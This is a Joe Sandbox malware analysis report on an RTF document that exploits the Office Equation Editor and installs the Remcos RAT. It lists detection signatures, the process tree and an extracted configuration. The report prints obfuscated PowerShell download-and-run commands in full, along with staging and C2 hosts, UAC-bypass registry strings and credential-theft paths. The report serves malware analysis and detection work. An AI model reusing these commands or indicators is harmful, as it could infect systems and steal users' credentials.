Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DSpWOKW7zn.rtf

Overview

General Information

Sample name:DSpWOKW7zn.rtf
renamed because original name is a hash value
Original sample name:26595ba1951c5b5b9b8a328be0d93f1c.rtf
Analysis ID:1526390
MD5:26595ba1951c5b5b9b8a328be0d93f1c
SHA1:afe1727998060a45fd092daa8189a3311d5f0823
SHA256:7664fd0a78d92fefa3f4b1528b7f41ad6d4f4940562ce017b2402732f2cbd9cb
Tags:RATRemcosRATrtfuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Maps a DLL or memory area into another process
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3284 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3368 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3536 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3956 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ftrhfuxf" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\inwrfmihsqs" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 4064 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "dumboi.duckdns.org:51525:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8AXK3L", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
DSpWOKW7zn.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1170:$obj1: \objhtml
  • 0x1195:$obj2: \objdata
  • 0x11ad:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.873764967.000000000051C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.874039059.000000000231E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000009.00000002.873637791.00000000004C5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              Click to see the 25 entries
              SourceRuleDescriptionAuthorStrings
              9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    9.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6c4b8:$a1: Remcos restarted by watchdog!
                    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                    9.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x6657c:$str_b2: Executing file:
                    • 0x675fc:$str_b3: GetDirectListeningPort
                    • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x67128:$str_b7: \update.vbs
                    • 0x665a4:$str_b9: Downloaded file:
                    • 0x66590:$str_b10: Downloading file:
                    • 0x66634:$str_b12: Failed to upload file:
                    • 0x675c4:$str_b13: StartForward
                    • 0x675e4:$str_b14: StopForward
                    • 0x67080:$str_b15: fso.DeleteFile "
                    • 0x67014:$str_b16: On Error Resume Next
                    • 0x670b0:$str_b17: fso.DeleteFolder "
                    • 0x66624:$str_b18: Uploaded file:
                    • 0x665e4:$str_b19: Unable to delete:
                    • 0x67048:$str_b20: while fso.FileExists("
                    • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 18 entries

                    Exploits

                    barindex
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 107.172.130.147, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3368, TargetFilename: C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains:
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 107.172.130.147, SourceIsIpv6: false, SourcePort: 80
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQ
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 